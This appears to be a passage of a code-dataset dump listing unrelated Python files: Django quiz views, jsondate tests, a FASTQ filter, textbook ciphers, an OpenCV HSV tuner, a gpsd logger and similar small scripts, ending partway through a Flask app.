index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
998,300 | 9d4e40c95c9841e953e810458722920d3ed67ec7 | import datetime
import json
import unittest
import six
import jsondate
class RoundTripCases(object):
    """Mixin of serialize/deserialize round-trip tests.

    Concrete subclasses must provide ``roundtrip(input)`` which encodes
    and decodes via jsondate.  NOTE(review): these tests rely on jsondate
    coercing ISO-formatted strings back into date/datetime objects on
    load -- confirm against the jsondate documentation.
    """

    def _test_roundtrip(self, input, expected=None, test_types=False):
        # Round-trip `input` and compare to `expected` (defaults to the
        # input itself).  `test_types` is accepted but unused here.
        output = self.roundtrip(input)
        expected = expected if expected else input
        self.assertEqual(output, expected)
        return output

    def test_empty(self):
        self._test_roundtrip({})

    def test_none(self):
        self._test_roundtrip(dict(foo=None))

    def test_datetime(self):
        orig_dict = dict(created_at=datetime.datetime(2011, 1, 1))
        self._test_roundtrip(orig_dict)

    def test_date(self):
        orig_dict = dict(created_at=datetime.date(2011, 1, 1))
        self._test_roundtrip(orig_dict)

    def test_datelike_string(self):
        "A string that looks like a date *will* be interpreted as a date."
        orig_dict = dict(created_at='2011-01-01')
        expected = dict(created_at=datetime.date(2011, 1, 1))
        self._test_roundtrip(orig_dict, expected)

    @staticmethod
    def _strdict(T):
        # Small dict whose keys and values are all built with type/ctor T.
        return { T('foo'): T('bar'), T('empty'): T('') }

    def _test_string_roundtrips(self, intype, outtype):
        # Strings fed in as `intype` must come back as `outtype`
        # (JSON text always decodes to six.text_type).
        input = self._strdict(intype)
        expected = self._strdict(six.text_type)
        output = self._test_roundtrip(input, expected)
        for k, v in six.iteritems(output):
            self.assertEqual(type(k), outtype)
            self.assertEqual(type(v), outtype)

    def test_str_roundtrips(self):
        self._test_string_roundtrips(str, six.text_type)

    def test_unicode_roundtrips(self):
        self._test_string_roundtrips(six.text_type, six.text_type)
class DumpsLoadsTests(RoundTripCases, unittest.TestCase):
    """Round-trip through the string API: dumps() then loads()."""

    @staticmethod
    def roundtrip(input):
        return jsondate.loads(jsondate.dumps(input))


class DumpLoadTests(RoundTripCases, unittest.TestCase):
    """Round-trip through the file API: dump() to a buffer, then load()."""

    @staticmethod
    def roundtrip(input):
        fileobj = six.StringIO()
        jsondate.dump(input, fileobj)
        fileobj.seek(0)  # rewind so load() reads from the start
        return jsondate.load(fileobj)


class UnexpectedTypeTests(unittest.TestCase):
    def test_unexpected_type_raises(self):
        # set() is not JSON-serializable, so dumps() must raise TypeError.
        dict_ = {'foo': set(['a'])}
        with self.assertRaises(TypeError):
            jsondate.dumps(dict_)
|
998,301 | dfe9741b1f205802be97de6968f1f4bf8131b229 | # -*- coding: utf-8 -*-
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class MyUser(User):
    """Subclass of Django's User that displays as the user's full name."""

    def __unicode__(self):
        return self.get_full_name()
class MyFile(models.Model):
    """A file record owned by a user and addressed through a short link."""
    file_name = models.CharField(max_length=50)
    user = models.ForeignKey(User)
    shortlink = models.CharField(max_length=200)

    def __unicode__(self):
        # Fixed: was misspelled `__unicode` (missing trailing underscores),
        # so Django never used it for the string representation.
        return self.shortlink
|
998,302 | 91b6e3e016c7c2623aef20759cea215f892da4af | #!/usr/bin/env python
import sys
import argparse
from itertools import izip_longest
def anabl_getSeqsFromFastX(fn, X=2):
    """Yield records from a FASTA/FASTQ-like file.

    Each record is ``(header_line, tuple_of_next_X-1_lines)`` with all
    lines stripped of surrounding whitespace.  X=2 suits FASTA (header +
    sequence), X=4 suits FASTQ.

    Fixes over the original: works on Python 3 as well as 2 (``next(it)``
    and ``range`` instead of ``it.next()``/``xrange``), catches only
    StopIteration instead of a bare ``except`` that hid real errors, and
    closes the file even when the consumer abandons the generator early.
    """
    it = open(fn)
    try:
        for head in it:
            try:
                # Collect the X-1 lines that belong to this header.
                body = tuple([next(it).strip() for _ in range(X - 1)])
            except StopIteration:
                # Truncated final record: stop quietly, as before.
                break
            yield (head.strip(), body)
    finally:
        it.close()
def getFastqIdentifier(string):
    """Strip the leading '@'/'>' marker and any pair suffix or description."""
    if string.endswith(('/1', '/2')):
        # Paired-end id: drop the marker and the trailing "/1" or "/2".
        return string[1:-2]
    # Otherwise keep only the first whitespace-separated token, minus the marker.
    return string.split()[0][1:]
def extractSequences(inR1, outR1, keepSequences, inR2=None, outR2=None, fmt='fq', overwrite='ab'):
    """Copy reads whose ids are in `keepSequences` from inR1 (and the
    paired inR2, if given) into outR1 (and outR2).

    NOTE: Python 2 only (uses generator ``.next()``).  `keepSequences` is
    mutated in place: ids that are found get removed, so whatever remains
    afterwards is the "missing" set.  `overwrite` is the output file mode
    ('ab' appends).
    """
    # Records are 4 lines for FASTQ, 2 for FASTA.
    fastx = 4 if fmt == 'fq' else 2
    fwdOut = open(outR1, overwrite)
    fwdGen = anabl_getSeqsFromFastX(inR1, X=fastx)
    revOut, revGen = None, None
    revSid, revSeq = None, None
    if inR2 is not None and outR2 is not None:
        # Paired-end mode: mirror every step on the reverse-read files.
        revOut = open(outR2, overwrite)
        revGen = anabl_getSeqsFromFastX(inR2, X=fastx)
    fqid1, fqid2 = None, None
    #print fwdOut is None, fwdGen is None, revOut is None, revGen is None
    #sys.exit(1)
    seqCounter = 0
    while True:
        try:
            fwdSid, fwdSeq = fwdGen.next()
            fqid1 = getFastqIdentifier(fwdSid)
            if revGen is not None:
                revSid, revSeq = revGen.next()
                fqid2 = getFastqIdentifier(revSid)
        except:
            # Generators exhausted (or a read failed): end of input.
            sys.stderr.write("Broke out of main loop after %i sequences.\n%i sequences still not found." % (seqCounter, len(keepSequences)))
            break
        seqCounter += 1
        if fqid1 != fqid2 and fqid2 is not None:
            # Forward/reverse files are out of sync -- abort rather than mispair.
            sys.stderr.write('Error: fqid-mismatch %s %s.\n' % (fqid1, fqid2))
            sys.exit(1)
        if fqid1 in keepSequences:
            # Found one of the wanted ids: write it out and mark it done.
            keepSequences.difference_update(set([fqid1]))
            fwdOut.write(('%s\n' * fastx) % ((fwdSid,) + fwdSeq))
            if revOut is not None:
                revOut.write(('%s\n' * fastx) % ((revSid,) + revSeq))
        else:
            pass
    fwdOut.close()
    if revOut is not None:
        revOut.close()
    #open(inR1 + '.missing', 'wb').write('\n'.join([id_ for id_ in keepSequences]))
    pass
def main(argv):
descr = ''
parser = argparse.ArgumentParser(description=descr)
parser.add_argument('--in1', help='The r1-file (single-end reads or left paired-end reads).')
parser.add_argument('--in2', help='The r2-file (right paired-end reads)')
parser.add_argument('--input-format', help='Input sequences stored in fa or fq file(s).', default='fq')
parser.add_argument('--out1', type=str, help='The r1-output file.')
parser.add_argument('--out2', type=str, help='The r2-output file.')
parser.add_argument('--keep', type=str, help='List (file) of sequence identifies to keep.')
args = parser.parse_args()
#print args.keep
#print keepSequences
#return None
inputs1, inputs2 = args.in1.split(','), [None]
if 'in2' in args:
inputs2 = args.in2.split(',')
# print inputs1, inputs2
# return None
keepSequences = set([sid.strip() for sid in open(args.keep)])
for in1, in2 in izip_longest(inputs1, inputs2):
print in1, in2
extractSequences(in1, args.out1, keepSequences, inR2=in2, outR2=args.out2)
open(args.keep + '.missing', 'wb').write('\n'.join([id_ for id_ in keepSequences]))
"""
wanted = set([sid.strip() for sid in open(sys.argv[2])])
total = len(wanted)
extracted = set()
for sid, seq, sep, qual in anabl_getSeqsFromFastX(sys.argv[1]):
found
for sid, seq in anabl_getContigsFromFASTA(sys.argv[1]):
found = False
for wid in wanted:
if sid.startswith(wid):
found = True
break
if found:
wanted.difference_update(set([wid]))
extracted.add(wid)
sys.stdout.write('>%s\n%s\n' % (sid, seq))
if wanted:
sys.stderr.write('%i sequence(s) were not found in %s.\n' % (len(wanted), sys.argv[1]))
for sid in wanted:
sys.stderr.write('%s\n' % sid)
"""
main(sys.argv[1:])
|
998,303 | 57a3d3b13077b49ad800032040eb6d0d91e54f46 | from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
from django.shortcuts import render, redirect, get_object_or_404, reverse
from django.contrib import messages
from django.urls import reverse_lazy
from .models import Quiz, Quiz_Question, Choice, StudentAnswer, TakenQuiz, StudentAttemptedList
from django.views.generic import ListView, CreateView, DeleteView
from django.db.models import Count, Sum
from django.utils import timezone
import datetime
from .forms import AddQuizForm, QuestionModelForm, TakeQuizForm, ChoiceFormset
class Baseview(LoginRequiredMixin, ListView):
    """Student home page: paginated quizzes for the user's subjects."""
    model = Quiz
    context_object_name = 'quizes'
    template_name = 'quiz/quiz_stud.html'
    paginate_by = 10

    def get_queryset(self):
        # Only quizzes belonging to subjects this user is enrolled in.
        user = self.request.user
        sub = user.subjects.all()
        queryset = Quiz.objects.filter(subject__in=sub)
        return queryset
class Quizconf(LoginRequiredMixin, ListView):
    """Confirmation page shown before a student starts a quiz."""
    model = Quiz
    context_object_name = 'quizes'
    template_name = 'quiz/quiz_conf.html'

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        user = self.request.user
        context['user'] = user
        query = get_object_or_404(Quiz, pk=self.kwargs.get('pk'))
        context['qcount'] = Quiz_Question.objects.filter(quiz=query).count()
        # 'check' == 0 -> quiz already attempted; 1 -> may still take it.
        try:
            query = get_object_or_404(StudentAttemptedList, user=user)
            if query.quizzes.filter(pk=self.kwargs.get('pk')).exists():
                context['check'] = 0
            else:
                context['check'] = 1
        except:
            # No attempt list exists yet for this user: treat as not attempted.
            context['check'] = 1
        return context

    def get_queryset(self):
        # NOTE(review): returns a single Quiz, not a queryset -- the
        # template presumably iterates or uses it directly; confirm.
        queryset = get_object_or_404(Quiz, pk=self.kwargs.get('pk'))
        return queryset
class NewQuiz(LoginRequiredMixin, CreateView):
    """Teacher-only quiz creation form; jumps to question entry on success."""
    model = Quiz
    form_class = AddQuizForm
    template_name = 'quiz/new_quiz.html'

    def render_to_response(self, context):
        # Students cannot create quizzes.
        user = self.request.user
        if user.user_type == 'student':
            return redirect('quiz:quiz_home')
        return super(NewQuiz, self).render_to_response(context)

    def form_valid(self, form):
        # Attach the creating teacher as owner before saving.
        quiz = form.save(commit=False)
        quiz.owner = self.request.user
        quiz.save()
        return redirect('quiz:question_add', pk=quiz.pk)

    def get_form_kwargs(self):
        # AddQuizForm takes the current user (presumably to scope its
        # choices -- see the form's definition).
        kwargs = super(NewQuiz,self).get_form_kwargs()
        kwargs['user'] = self.request.user
        return kwargs
class TakenQuizListView(LoginRequiredMixin, ListView):
    """Student-only list of the quizzes this student has completed."""
    model = TakenQuiz
    context_object_name = 'taken_quizzes'
    template_name = 'quiz/taken_quiz.html'
    paginate_by = 5

    def render_to_response(self, context):
        # Teachers have no taken-quiz history; bounce them home.
        user=self.request.user
        if user.user_type == 'teacher':
            return redirect('quiz:quiz_home')
        return super(TakenQuizListView, self).render_to_response(context)

    def get_queryset(self):
        # This student's attempts, each annotated with its question count.
        user = self.request.user
        queryset = TakenQuiz.objects.filter(student__user=user)\
            .annotate(qcount=Count('quiz__questions'))\
            .order_by('quiz__name')
        return queryset
class Quizresultview(LoginRequiredMixin, ListView):
    """Teacher view listing every student attempt for one quiz."""
    model = TakenQuiz
    context_object_name = "taken_quizs"
    template_name = "quiz/quiz_result.html"

    def render_to_response(self, context):
        # Students may not inspect other students' results.
        user = self.request.user
        if user.user_type == 'student':
            return redirect('quiz:quiz_home')
        return super(Quizresultview, self).render_to_response(context)

    def get_queryset(self):
        # Fixed: this was defined as `queryset`, which ListView treats as a
        # class attribute, not the `get_queryset()` hook -- the view ended
        # up exposing a bound method instead of this quiz's attempts.
        query = get_object_or_404(Quiz, pk=self.kwargs.get('pk'))
        return TakenQuiz.objects.filter(quiz=query)

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        ques = get_object_or_404(Quiz, pk=self.kwargs.get('pk'))
        context['qcount'] = Quiz_Question.objects.filter(quiz=ques).count()
        return context
class QuizDeleteView(LoginRequiredMixin, DeleteView):
    """Confirmation page letting a quiz's owner delete it."""
    model = Quiz
    context_object_name = 'quiz'
    template_name = 'quiz/quiz_delete_confirm.html'
    success_url = reverse_lazy('quiz:quiz_home')

    def render_to_response(self, context):
        # Only the quiz owner may reach the confirmation page.
        user = self.request.user
        quiz = get_object_or_404(Quiz, pk=self.kwargs.get('pk'))
        if quiz.owner != user:
            return redirect('quiz:quiz_home')
        return super(QuizDeleteView, self).render_to_response(context)

    # Removed a `delete()` override that only called super() -- it added
    # nothing over DeleteView's default behaviour.

    def get_queryset(self):
        return Quiz.objects.filter(pk=self.kwargs.get('pk'))
class QuestionDeleteView(LoginRequiredMixin, DeleteView):
    """Confirmation page letting a quiz's owner delete one of its questions."""
    model = Quiz_Question
    context_object_name = "quest"
    template_name = "quiz/question_delete_confirm.html"
    pk_url_kwarg = 'ques_pk'

    def render_to_response(self, context):
        # Only the owner of the parent quiz may delete its questions.
        user = self.request.user
        quiz = get_object_or_404(Quiz, pk=self.kwargs.get('pk'))
        if quiz.owner != user:
            return redirect('quiz:quiz_home')
        return super(QuestionDeleteView, self).render_to_response(context)

    def get_context_data(self, **kwargs):
        # Expose the parent quiz to the confirmation template.
        question = self.get_object()
        kwargs['quiz'] = question.quiz
        return super().get_context_data(**kwargs)

    # Removed a `delete()` override that only called super() -- redundant.

    def get_queryset(self):
        return Quiz_Question.objects.filter(pk=self.kwargs.get('ques_pk'))

    def get_success_url(self):
        # Back to the question list of the quiz this question belonged to.
        question = self.get_object()
        return reverse('quiz:question_list', kwargs={'pk': question.quiz_id})
class QuestionListView(LoginRequiredMixin, ListView):
    """Paginated list of one quiz's questions, with their choices."""
    model = Quiz_Question
    template_name = "quiz/question_list.html"
    context_object_name = "questions"
    paginate_by = 8

    def get_queryset(self):
        quiz = get_object_or_404(Quiz, pk=self.kwargs.get('pk'))
        queryset = Quiz_Question.objects.filter(quiz=quiz)
        return queryset

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        quiz = get_object_or_404(Quiz, pk=self.kwargs.get('pk'))
        context['quiz'] = quiz
        context['choices'] = Choice.objects.filter(question__quiz=quiz)
        # Today's date, for the template to compare against quiz.date
        # (the same check TakeQuiz performs server-side).
        context['now'] = timezone.now().date()
        return context
class AfterQuizList(LoginRequiredMixin, ListView):
    """Post-quiz review: questions, choices, the student's answers and score."""
    model = Quiz_Question
    template_name = "quiz/after_quiz.html"
    context_object_name = "questions"

    def get_queryset(self):
        quiz = get_object_or_404(Quiz, pk=self.kwargs.get('pk'))
        queryset = Quiz_Question.objects.filter(quiz=quiz)
        return queryset

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        quiz = get_object_or_404(Quiz, pk=self.kwargs.get('pk'))
        context['quiz'] = quiz
        context['choices'] = Choice.objects.filter(question__quiz=quiz)
        context['answers'] = StudentAnswer.objects.filter(answer__question__quiz=quiz)
        user = self.request.user
        # 404 if this user never actually took the quiz.
        queryset = get_object_or_404(TakenQuiz, quiz=quiz, student__user=user)
        context['scores'] = queryset
        context['qcount'] = Quiz_Question.objects.filter(quiz=quiz).count()
        return context
class QuizSearchResult(LoginRequiredMixin, ListView):
    """Name search (?q=...) within the quizzes of the user's subjects."""
    model = Quiz
    context_object_name = 'quizes'
    template_name = 'quiz/quiz_stud.html'
    paginate_by = 10

    def get_queryset(self):
        user = self.request.user
        sub = user.subjects.all()
        queryset = Quiz.objects.filter(subject__in=sub)
        query = self.request.GET.get('q')
        if query:
            # Case-insensitive substring match; missing/empty q returns all.
            queryset = queryset.filter(name__icontains=query)
        return queryset
@login_required
def QuestionAdd(request, pk):
    """Teacher-only page to add one question (and its choices) to quiz `pk`.

    GET renders an empty question form plus an empty choice formset; a
    valid POST saves the question and its choices, then reloads the page
    so the next question can be entered.  An invalid POST falls through
    to re-render with validation errors.
    """
    user = request.user
    if user.user_type == 'student':
        return redirect('quiz:quiz_home')
    template_name = 'quiz/newques.html'
    quiz = get_object_or_404(Quiz, pk=pk)
    if request.method == 'GET':
        questionform = QuestionModelForm(request.GET or None)
        formset = ChoiceFormset(queryset=Choice.objects.none())
    elif request.method == 'POST':
        questionform = QuestionModelForm(request.POST)
        formset = ChoiceFormset(request.POST)
        if questionform.is_valid() and formset.is_valid():
            # Save the question first so the choices can point at it.
            question = questionform.save(commit=False)
            question.quiz = quiz
            question.save()
            for form in formset:
                choice = form.save(commit=False)
                choice.question = question
                choice.save()
            return redirect('quiz:question_add', quiz.pk)
    return render(request, template_name, {
        'questionform': questionform,
        'quiz': quiz,
        'formset': formset,
    })
@login_required
def TakeQuiz(request, pk):
    """Serve one unanswered question at a time; record the score when done.

    Students only; a quiz may be attempted once and only on its set date.
    """
    user = request.user
    if user.user_type == 'teacher':
        return redirect('quiz:quiz_home')
    # get_or_create replaces the old try/except-create dance plus the
    # duplicated get_object_or_404 lookup that followed it.
    query, _created = StudentAttemptedList.objects.get_or_create(user=user)
    if query.quizzes.filter(pk=pk).exists():
        # Already attempted: no retakes.
        return redirect('quiz:taken_quiz_list')
    quiz = get_object_or_404(Quiz, pk=pk)
    if (quiz.date != timezone.now().date()):
        messages.warning(request, "Attempt on the date")
        return render(request, 'quiz/quiz_error.html')
    total_questions = quiz.questions.count()
    unanswered_questions = query.get_unanswered_questions(quiz)
    total_unanswered_questions = unanswered_questions.count()
    question = unanswered_questions.first()
    if request.method == 'POST':
        form = TakeQuizForm(question=question, data=request.POST)
        if form.is_valid():
            student_answer = form.save(commit=False)
            student_answer.student = query
            student_answer.save()
            if query.get_unanswered_questions(quiz).exists():
                # More questions left: reload with the next one.
                return redirect('quiz:takequiz', pk)
            # Last question answered: tally the score and update the
            # student's running total across all taken quizzes.
            correct_answers = query.quiz_answers.filter(
                answer__question__quiz=quiz, answer__is_correct=True).count()
            TakenQuiz.objects.create(student=query, quiz=quiz, score=correct_answers)
            user.score = TakenQuiz.objects.filter(student=query).aggregate(
                Sum('score'))['score__sum']
            user.save()
            return redirect('quiz:after_quiz', pk)
    else:
        form = TakeQuizForm(question=question)
    return render(request, 'quiz/take_quiz_form.html', {
        'quiz': quiz,
        'question': question,
        'form': form,
        'answered_questions': total_questions - total_unanswered_questions,
        'total_questions': total_questions
    })
|
998,304 | b85a2acb48ec21b69bdeec29d68a1b1b24544596 | import gps
# Listen on port 2947 (gpsd) of localhost
session = gps.gps("localhost", "2947")
session.stream(gps.WATCH_ENABLE | gps.WATCH_NEWSTYLE)
# NOTE: Python 2 script (print statement below).  Polls gpsd forever and
# appends each TPV fix to test.txt as one comma-separated line.
while True:
    try:
        report = session.next()
        # Wait for a 'TPV' report and display the current time
        # To see all report data, uncomment the line below
        #print report
        if report['class'] == 'TPV':
            # Stringify every field so they can be joined into a CSV row.
            report.time = str(report.time)
            report.device = str(report.device)
            report.lon = str(report.lon)
            report.lat = str(report.lat)
            report.mode = str(report.mode)
            report.eps = str(report.eps)
            report.epx = str(report.epx)
            report.epy = str(report.epy)
            report.epv = str(report.epv)
            report.speed = str(report.speed)
            tosave = report.time + "," + report.device + "," + report.lon + "," + report.lat + "," + report.mode + "," + report.eps + "," + report.epx + "," + report.epy + "," + report.epv + "," + report.speed + "\n"
            # Open/append/close per fix so the log survives a hard kill.
            f = open('test.txt', 'a') #create a file using the given input
            f.write(tosave)
            f.close()
            #
            #if hasattr(report, 'time'):
            # print report.time
            #if hasattr(report, 'device'):
            # print report.device
            #if hasattr(report, 'lon'):
            # print report.lon
            # if hasattr(report, 'lat'):
            # print report.lat
            # if hasattr(report, 'mode'):
            # print report.mode
            # if hasattr(report, 'eps'):
            # print report.eps
            # if hasattr(report, 'epx'):
            # print report.epx
            # if hasattr(report, 'epy'):
            # print report.epy
            # if hasattr(report, 'epv'):
            # print report.epv
            # if hasattr(report, 'speed'):
            # print report.speed
    except KeyError:
        # Reports without the expected keys are simply skipped.
        pass
    except KeyboardInterrupt:
        quit()
    except StopIteration:
        session = None
        print "GPSD has terminated"
|
998,305 | c8c26ba5efb9e2b5d9e5cab4be9c938b13d0488e | # used for string manipulations :
# to verify string matches a particular pattern or not
# for substitution in a string
import re
pattern = r"eggs"  # raw-string pattern to look for

# match() only succeeds when the pattern occurs at the START of the string.
if re.match(pattern, "eggszzzzzzz"): # string should match in beginning.
    print("match found")
else:
    print("no match found")

# search() succeeds when the pattern occurs ANYWHERE in the string.
if re.search(pattern, "zzzzeggszzzz"):
    print("match found")
else:
    print("no match found")

# findall() returns every non-overlapping occurrence of the pattern.
print(re.findall(pattern, "zzzzeggszzzz"))

# EXAMPLE PROBLEM: replace all occurrences of "John" with another string.
string = "My name is John, John is cool"
pattern = r"John"
newstring = re.sub(pattern, "Hitesh", string)
print(newstring)
998,306 | 944d116e1568f52f5624b68886ac7d7d169c6ed0 | import string
import random
ALPHABET = string.ascii_uppercase


def readfile(file):
    """Return every ASCII letter of *file*'s contents, uppercased."""
    handle = open(file, mode='r')
    text = handle.read()
    handle.close()
    # Keep A-Z / a-z only (by ASCII code), folding everything to upper case.
    return ''.join(ch.upper() for ch in text
                   if 65 <= ord(ch) <= 90 or 97 <= ord(ch) <= 122)


def offset(char, offset):
    """Shift *char* forward by *offset* positions, wrapping past 'Z'."""
    shifted = ALPHABET.index(char) + offset
    return ALPHABET[shifted % 26]


class Caesar:
    """Classic shift cipher over A-Z."""

    @staticmethod
    def encrypt(message, key):
        # Shift every character forward by `key`.
        return ''.join(offset(ch, key) for ch in message)

    @staticmethod
    def decrypt(ciphertext, key):
        # Shifting forward by 26-key undoes a forward shift of `key`.
        return ''.join(offset(ch, 26 - key) for ch in ciphertext)


class Vigenere:
    """Vigenere cipher: per-position Caesar shifts taken from the key."""

    @staticmethod
    def encrypt(message, key):
        shifts = [ALPHABET.index(k) for k in key] * (len(message) // len(key) + 1)
        return ''.join(offset(ch, s) for ch, s in zip(message, shifts))

    @staticmethod
    def decrypt(ciphertext, key):
        # 26 - shift inverts each per-position shift.
        shifts = [26 - ALPHABET.index(k) for k in key] * (len(ciphertext) // len(key) + 1)
        return ''.join(offset(ch, s) for ch, s in zip(ciphertext, shifts))


class Substitution:
    """Keyword substitution cipher."""

    @staticmethod
    def encrypt(message, key):
        cipher_alph = Substitution.buildAlphabet(key)
        encrypted = []
        for ch in message:
            encrypted.append(cipher_alph[ALPHABET.index(ch.upper())])
        return ''.join(encrypted)

    @staticmethod
    def buildAlphabet(key):
        """Cipher alphabet: the key's letters first, then the remaining
        letters starting just after the key's last letter."""
        keyword = key.upper()
        start = ALPHABET.index(keyword[-1]) + 1
        rotated = ''.join(offset(ch, start) for ch in ALPHABET)
        tail = ''.join(ch for ch in rotated if ch not in keyword)
        return keyword + tail

    @staticmethod
    def decrypt(ciphertex, key):
        cipher_alph = Substitution.buildAlphabet(key)
        decrypted = []
        for ch in ciphertex:
            decrypted.append(ALPHABET[cipher_alph.index(ch.upper())])
        return ''.join(decrypted)


class Affine:
    """Affine cipher E(x) = (a*x + b) mod 26 with key = (a, b)."""

    @staticmethod
    def modReverse(a, b):
        """Modular inverse of min(a, b) modulo max(a, b), via the
        extended Euclidean algorithm."""
        r = [min(a, b), max(a, b)]
        s = [1, 0]
        t = [0, 1]
        while r[-1] != 1:
            q = r[-2] // r[-1]
            r.append(r[-2] - q * r[-1])
            s.append(s[-2] - q * s[-1])
            t.append(t[-2] - q * t[-1])
        return (s[-1] % r[1])

    #key should be the tuple
    @staticmethod
    def encrypt(message, key):
        a, b = key[0], key[1]
        return ''.join(ALPHABET[(ALPHABET.index(ch) * a + b) % 26] for ch in message)

    #key should be the tuple
    @staticmethod
    def decrypt(ciphertext, key):
        try:
            inv = Affine.modReverse(key[0], 26)
            return ''.join(ALPHABET[inv * (ALPHABET.index(ch) - key[1]) % 26]
                           for ch in ciphertext)
        except ZeroDivisionError:
            pass


if __name__=='__main__':
    # Caesar test
    print('---Caesar---')
    test = 'DEFENDTHEEASTWALLOFTHECASTLE'
    k = 1
    c = Caesar.encrypt(test, k)
    d = Caesar.decrypt(c, k)
    print(c)
    print(d)
    # Vigenere test
    print('---Vigenere---')
    test = 'DEFENDTHEEASTWALLOFTHECASTLE'
    c = Vigenere.encrypt(test, 'FORTIFICATION'.upper())
    d = Vigenere.decrypt(c, 'FORTIFICATION'.upper())
    print(c)
    print(d)
    # Substitution test
    print('---Substitution---')
    test='DEFENDTHEEASTWALLOFTHECASTLE'
    c = Substitution.encrypt(test, 'zebra')
    print(c)
    d = Substitution.decrypt(c, 'zebra')
    print(d)
    # Affine test
    print('---Affine---')
    test = 'DEFENDTHEEASTWALLOFTHECASTLE'
    c = Affine.encrypt(test, (5, 7))
    print(c)
    d = Affine.decrypt(c, (5, 7))
    print(d)
998,307 | e84b317eb2e3bfac4c86f96253da7d356b012497 | from functools import lru_cache
class Solution:
    def maxA(self, n: int) -> int:
        """Max number of 'A's printable with n key presses (LeetCode 651).

        Moves: press 'A' (1 press), or Ctrl-A + Ctrl-C + Ctrl-V (3 presses
        to start pasting, each further Ctrl-V multiplies the output).

        Top-down DP: dp(x) is the best count for x presses -- either type
        x A's directly, or finish at some i and spend the remaining
        presses on one select/copy plus pastes, giving dp(i) * (x-i-1).
        """
        @lru_cache(maxsize=None)  # explicit maxsize: also works on Python < 3.8
        def dp(x: int) -> int:
            if x <= 6:
                return x  # with <= 6 presses, plain typing is optimal
            best = x
            for i in range(x - 2):  # largest useful i is x-3 (copy costs 3)
                best = max(best, dp(i) * (x - i - 1))
            return best

        return dp(n)
|
998,308 | f08dd7d45c5a10fbb33578524779ea2e334fbf17 | #!/usr/bin/env python
# encoding: utf-8
from mvpa2.clfs.knn import kNN
from mvpa2.measures.base import CrossValidation
from pulse.lda import lda
import numpy as np
def reduce_dim(labels, samples):
    # Project samples onto 2 LDA components (see pulse.lda.lda).
    return lda(np.array(samples), np.array(labels), 2)


def cv_kNN(data_set, partitioner):
    """Cross-validate a 12-nearest-neighbour classifier and return the
    mean of the per-fold results (presumably the error rate -- confirm
    against the mvpa2 CrossValidation docs)."""
    clf = kNN(12)
    clf.set_postproc(None)  # raw outputs, no post-processing
    cv = CrossValidation(clf, partitioner)
    cv_results = cv(data_set)
    return np.mean(cv_results)


def train_kNN(data_set):
    """Train and return a 12-nearest-neighbour classifier."""
    clf = kNN(12)
    clf.train(data_set)
    return clf
|
998,309 | 1696c4b21b6a01f6a0d7c18a4cdd6b8a006311b8 | # **** Book class ****
class Book:
# **** constructor method ****
def __init__(self, title, author=None):
self.title = title
self.author = author
# **** print info about the book ****
def print_info(self):
print(self.title + " is written by " + self.author)
#print(f"{self.title} is written by {self.author}")
# **** representation of a book (equivalent to toString in Java) ****
def __repr__(self):
return self.title
|
998,310 | 78f46fe8537e2b35b2ae7851a3eaa6c589b4a10d | #! /usr/bin/python3
from Metadata import Metadata
from ImageSynchronizer import ImageSynchronizer
import numpy as np
import matplotlib.pyplot as plt
tokamak = Metadata()
tokamak.parse_metadata('tokamak/dataformat.txt','tokamak/tokamak.txt')
# Robot trajectory in a local East/North frame (metres, per axis labels).
x_tokamak = tokamak.get_nparray('x')
y_tokamak = tokamak.get_nparray('y')

fig1 = plt.figure()
# Fixed: previously plotted undefined names `x`/`y` (NameError); use the
# arrays actually loaded above.
plt.plot(x_tokamak, y_tokamak, label="robot position")
plt.legend(loc="upper right")
plt.xlabel("East (m)")
plt.ylabel("North (m)")
plt.gca().set_aspect('equal', adjustable='box')  # 1:1 so the path isn't distorted
plt.show(block=False)
|
998,311 | cd2a072ee5a67466de8551647b0b3eea7b14b36d | import cv2
import numpy as np
framewidth = 640
frameheight = 480
cap = cv2.VideoCapture(0)  # default webcam
cap.set(3,framewidth)   # property 3: frame width
cap.set(4,frameheight)  # property 4: frame height

def empty(a):
    # No-op trackbar callback (OpenCV requires a callable).
    pass

# Create the trackbar window for live HSV range tuning.
cv2.namedWindow("HSV")
cv2.resizeWindow("HSV",641,240)
cv2.createTrackbar("HUE Min","HSV",0,179,empty) # `empty` is the required no-op callback
cv2.createTrackbar("HUE Max","HSV",179,179,empty)
cv2.createTrackbar("SAT Min","HSV",0,255,empty)
cv2.createTrackbar("SAT Max","HSV",255,255,empty)
cv2.createTrackbar("VALUE Min","HSV",0,255,empty)
cv2.createTrackbar("VALUE Max","HSV",255,255,empty)

while True:
    ret,img = cap.read()
    imgHsv = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)
    # Read the current HSV bounds from the trackbars.
    h_min = cv2.getTrackbarPos("HUE Min","HSV")
    h_max = cv2.getTrackbarPos("HUE Max","HSV")
    s_min = cv2.getTrackbarPos("SAT Min","HSV")
    s_max = cv2.getTrackbarPos("SAT Max","HSV")
    v_min = cv2.getTrackbarPos("VALUE Min","HSV")
    v_max = cv2.getTrackbarPos("VALUE Max","HSV")
    # Threshold the HSV image to the selected range.
    lower = np.array([h_min,s_min,v_min])
    upper = np.array([h_max,s_max,v_max])
    mask =cv2.inRange(imgHsv,lower,upper)
    result = cv2.bitwise_and(img,img, mask = mask)
    # Promote the single-channel mask to BGR so it can be stacked.
    mask = cv2.cvtColor(mask, cv2.COLOR_GRAY2BGR)
    # Show original | mask | masked result side by side, at half size.
    hStack = np.hstack([img,mask,result])
    #cv2.imshow("image",img)
    #cv2.imshow("HSVimg",imgHsv)
    #cv2.imshow("Mask", mask)
    #cv2.imshow("Result", result)
    hStack = cv2.resize(hStack,(0,0),fx=0.5,fy=0.5)
    cv2.imshow("stacked",hStack)
    if cv2.waitKey(1) == ord('q'):
        break

cap.release()
cv2.destroyAllWindows()
998,312 | 2023b041b362f3d48a71e6c24f3a963a30278607 | from flask import Flask, url_for, flash ,redirect, render_template, request, abort
from scoring import scoring
import json
app = Flask(__name__)
app.secret_key = "dsfajkl23@!fesjkl#"  # NOTE(review): hard-coded secret; move to config/env
scr = scoring()


@app.route("/")
def index():
    """Leaderboard page: render the current rankings."""
    rankings = scr.read_rank()
